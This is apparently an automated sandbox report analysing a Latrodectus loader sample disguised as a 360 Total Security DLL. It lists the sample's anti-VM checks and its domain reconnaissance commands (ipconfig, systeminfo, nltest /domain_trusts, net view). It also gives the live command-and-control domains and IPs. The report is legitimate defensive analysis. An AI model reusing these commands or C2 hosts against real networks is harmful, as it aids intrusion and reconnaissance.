Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: rundll32.exe, 00000009.00000002.3284572654.00000223820D0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\loaddll64.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0000000180070760

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,

3_2_0000000180066C3C

Source: C:\Windows\System32\rundll32.exe

3_2_00000001800033E0

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018000A7AC GetProcessHeap,

3_2_000000018000A7AC

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		3_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		3_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.219.28 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.136.103 443			Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180066A50 memset,GetModuleFileNameW,GetCommandLineW,memset,ShellExecuteExW,CloseHandle,

3_2_0000000180066A50

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle,

3_2_000000018004A650

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,

3_2_0000000180049278

Source: Update_79066994.dll.4.dr	Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe	Binary or memory string: Progman
Source: rundll32.exe	Binary or memory string: Program manager

Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018006A304 GetSystemTimeAsFileTime,

3_2_000000018006A304

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_00000203431C8AE0 GetUserNameA,wsprintfA,

4_2_00000203431C8AE0

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,

3_2_0000000180040CB0

Source: C:\Windows\System32\nltest.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: rundll32.exe	Binary or memory string: 360tray.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Latrodectus

Source: Yara match	File source: 3.2.rundll32.exe.26c61e20000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.20342fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.20342fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.203431c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.22380120000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.26c61e20000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.26c61e10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.203431c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.22380130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.22380120000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.22380130000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.26c61e10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3284037566.0000022380120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2040445129.0000020342FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2909305037.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2040526568.00000203431C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3283619847.000000A88ED78000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2979519134.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.3110926112.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2158647911.0000026C61E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3284079772.0000022380130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3284387768.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2856557891.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2158630473.0000026C61E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2928, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Latrodectus

Source: Yara match	File source: 3.2.rundll32.exe.26c61e20000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.20342fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.20342fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.203431c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.22380120000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.26c61e20000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.26c61e10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.203431c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.22380130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.22380120000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.22380130000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.26c61e10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3284037566.0000022380120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2040445129.0000020342FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2909305037.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2040526568.00000203431C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3283619847.000000A88ED78000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2979519134.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.3110926112.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2158647911.0000026C61E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3284079772.0000022380130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3284387768.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2856557891.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2158630473.0000026C61E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2928, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Valid Accounts	1 DLL Side-Loading	2 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Windows Service	1 Valid Accounts	1 DLL Side-Loading	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Scheduled Task/Job	11 Access Token Manipulation	1 File Deletion	NTDS	26 System Information Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Windows Service	1 Masquerading	LSA Secrets	381 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	112 Process Injection	1 Valid Accounts	Cached Domain Credentials	13 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	13 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Rundll32	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	21 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
360total.dll.dll	8%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll	8%	ReversingLabs

Source	Detection	Scanner	Label
https://grizmotras.com/live/U	0%	Avira URL Cloud	safe
https://jarinamaers.shop/7	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/&	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/4K&	0%	Avira URL Cloud	safe
https://grizmotras.com/g	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/dOIDInfo	0%	Avira URL Cloud	safe
https://jarinamaers.shop/n	0%	Avira URL Cloud	safe
https://jarinamaers.shop/rs	0%	Avira URL Cloud	safe
https://grizmotras.com/	0%	Avira URL Cloud	safe
ftp://ftp%2desktop.ini	0%	Avira URL Cloud	safe
https://jarinamaers.shop/	0%	Avira URL Cloud	safe
https://jarinamaers.shop/7-	0%	Avira URL Cloud	safe
https://grizmotras.com/live/)	0%	Avira URL Cloud	safe
https://pewwhranet.com/live/	0%	Avira URL Cloud	safe
https://wrankaget.site/live/	0%	Avira URL Cloud	safe
https://grizmotras.com/live/	0%	Avira URL Cloud	safe
https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin	0%	Avira URL Cloud	safe
https://grizmotras.com/live/p	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jarinamaers.shop	172.67.136.103	true	true		unknown
grizmotras.com	172.67.219.28	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wrankaget.site/live/	true	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/	true	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jarinamaers.shop/live/dOIDInfo	rundll32.exe, 00000009.00000003.3110073798.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/n	rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/rs	rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/&	rundll32.exe, 00000009.00000003.3110073798.00000223FFF2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pconf.f.360.cn/safe_update.php	rundll32.exe	false		high
https://jarinamaers.shop/7	rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/g	rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
ftp://ftp%2desktop.ini	rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr	false	Avira URL Cloud: safe	low
https://jarinamaers.shop/live/4K&	rundll32.exe, 00000009.00000002.3284739426.00000223FFE88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/	rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.8.dr	false		high
https://grizmotras.com/live/U	rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pewwhranet.com/live/	rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3256142995.00000223820D0000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/)	rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/	rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://pscan.f.360.cn/safe_update.php	rundll32.exe	false		high
https://jarinamaers.shop/7-	rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dr.f.360.cn/scanlist	rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr	false		high
https://grizmotras.com/live/p	rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie	rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr	false		high
http://sconf.f.360.cn/client_security_conf	rundll32.exe	false		high
http://dr.f.360.cn/scan	rundll32.exe	false		high
https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin	rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.136.103	jarinamaers.shop	United States		13335	CLOUDFLARENETUS	true
172.67.219.28	grizmotras.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431883
Start date and time:	2024-04-25 22:42:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	360total.dll.dll (renamed file extension from exe to dll)
Original Sample Name:	360total.dll.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winDLL@42/11@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 5 Number of non-executed functions: 279

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 360total.dll.dll

Simulations

Behavior and APIs

Time	Type	Description
22:43:05	API Interceptor	2x Sleep call for process: WerFault.exe modified
22:43:29	API Interceptor	5833237x Sleep call for process: rundll32.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
grizmotras.com	Util.dll	Get hash	malicious	Bazar Loader, Latrodectus	Browse	104.21.59.82

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://fusiongsb.com/wofice/	Get hash	malicious	Unknown	Browse	104.21.20.41
